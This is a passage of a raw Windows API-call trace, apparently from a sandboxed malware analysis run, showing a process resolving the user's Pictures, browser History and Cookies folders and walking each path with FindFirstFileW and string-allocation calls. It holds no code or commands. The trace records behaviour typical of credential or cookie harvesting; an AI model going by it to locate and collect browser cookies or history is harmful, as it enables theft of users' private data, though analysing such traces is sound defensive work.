psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0173.690] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures", psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0173.705] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0173.705] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0173.708] SysReAllocStringLen (in: pbstr=0x28fdf4*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf4*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0173.708] SysReAllocStringLen (in: pbstr=0x3420078*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x3420078*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0173.708] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0173.709] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", cchLength=0x3a | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 0x3a [0173.709] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history", len=0x3a | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 1 [0173.709] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.710] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.710] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0173.710] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x34200e0*="appdata") returned 1 [0173.711] SysReAllocStringLen (in: pbstr=0x34200ec*=0x0, psz="local", len=0x5 | out: pbstr=0x34200ec*="local") returned 1 [0173.711] SysReAllocStringLen (in: pbstr=0x34200f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x34200f8*="microsoft") returned 1 [0173.711] SysReAllocStringLen (in: pbstr=0x3420128*=0x0, psz="windows", len=0x7 | out: pbstr=0x3420128*="windows") returned 1 [0173.711] SysReAllocStringLen (in: pbstr=0x3420134*=0x0, psz="history", len=0x7 | out: pbstr=0x3420134*="history") returned 1 [0173.712] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.712] SysReAllocStringLen (in: pbstr=0x28fde4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fde4*="c:\\") returned 1 [0173.712] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.712] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ec510 [0173.712] FindNextFileW (in: hFindFile=0x10ec510, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0173.712] GetLastError () returned 0x12 [0173.712] FindClose (in: hFindFile=0x10ec510 | out: hFindFile=0x10ec510) returned 1 [0173.713] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.713] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fde4*="c:\\Users\\") returned 1 [0173.713] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0173.713] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ec510 [0173.713] FindNextFileW (in: hFindFile=0x10ec510, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0173.713] GetLastError () returned 0x12 [0173.713] FindClose (in: hFindFile=0x10ec510 | out: hFindFile=0x10ec510) returned 1 [0173.714] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0173.714] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\") returned 1 [0173.714] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0173.714] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x10ec510 [0173.714] FindNextFileW (in: hFindFile=0x10ec510, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0173.714] GetLastError () returned 0x12 [0173.714] FindClose (in: hFindFile=0x10ec510 | out: hFindFile=0x10ec510) returned 1 [0173.714] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0173.715] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0173.715] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0173.715] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x10ec510 [0173.715] FindNextFileW (in: hFindFile=0x10ec510, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0173.715] GetLastError () returned 0x12 [0173.715] FindClose (in: hFindFile=0x10ec510 | out: hFindFile=0x10ec510) returned 1 [0173.715] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0173.716] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0173.716] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0173.716] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x10ef150 [0173.716] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0173.716] GetLastError () returned 0x12 [0173.716] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.716] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", len=0x2a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft") returned 1 [0173.716] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", len=0x2b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\") returned 1 [0173.717] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0173.717] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x10ef150 [0173.717] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0173.717] GetLastError () returned 0x12 [0173.717] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.717] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", len=0x32 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows") returned 1 [0173.717] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", len=0x33 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\") returned 1 [0173.717] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="history", len=0x7 | out: pbstr=0x28fae8*="history") returned 1 [0173.718] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\history" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0x10ef150 [0173.718] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0173.718] GetLastError () returned 0x12 [0173.718] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.718] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0173.718] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0173.719] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0173.719] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0173.720] SysReAllocStringLen (in: pbstr=0x28fde8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0173.720] SysReAllocStringLen (in: pbstr=0x342007c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x342007c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0173.720] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0173.721] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", cchLength=0x3c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 0x3c [0173.721] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies", len=0x3c | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 1 [0173.721] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.922] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.922] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0173.923] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x34200e0*="appdata") returned 1 [0173.923] SysReAllocStringLen (in: pbstr=0x34200ec*=0x0, psz="roaming", len=0x7 | out: pbstr=0x34200ec*="roaming") returned 1 [0173.923] SysReAllocStringLen (in: pbstr=0x34200f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x34200f8*="microsoft") returned 1 [0173.924] SysReAllocStringLen (in: pbstr=0x3420128*=0x0, psz="windows", len=0x7 | out: pbstr=0x3420128*="windows") returned 1 [0173.924] SysReAllocStringLen (in: pbstr=0x3420134*=0x0, psz="cookies", len=0x7 | out: pbstr=0x3420134*="cookies") returned 1 [0173.929] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.929] SysReAllocStringLen (in: pbstr=0x28fdd8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdd8*="c:\\") returned 1 [0173.929] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.930] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.930] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdd8*="c:\\Users\\") returned 1 [0173.930] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0173.930] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0173.931] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0173.931] GetLastError () returned 0x12 [0173.931] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.931] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0173.931] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\") returned 1 [0173.932] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0173.932] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x10ef150 [0173.932] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0173.932] GetLastError () returned 0x12 [0173.932] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.933] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0173.933] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0173.933] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0173.933] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x10ef150 [0173.933] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0173.933] GetLastError () returned 0x12 [0173.933] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.934] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0173.934] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0173.934] SysReAllocStringLen (in: pbstr=0x28fae8*="roaming", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0173.934] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, 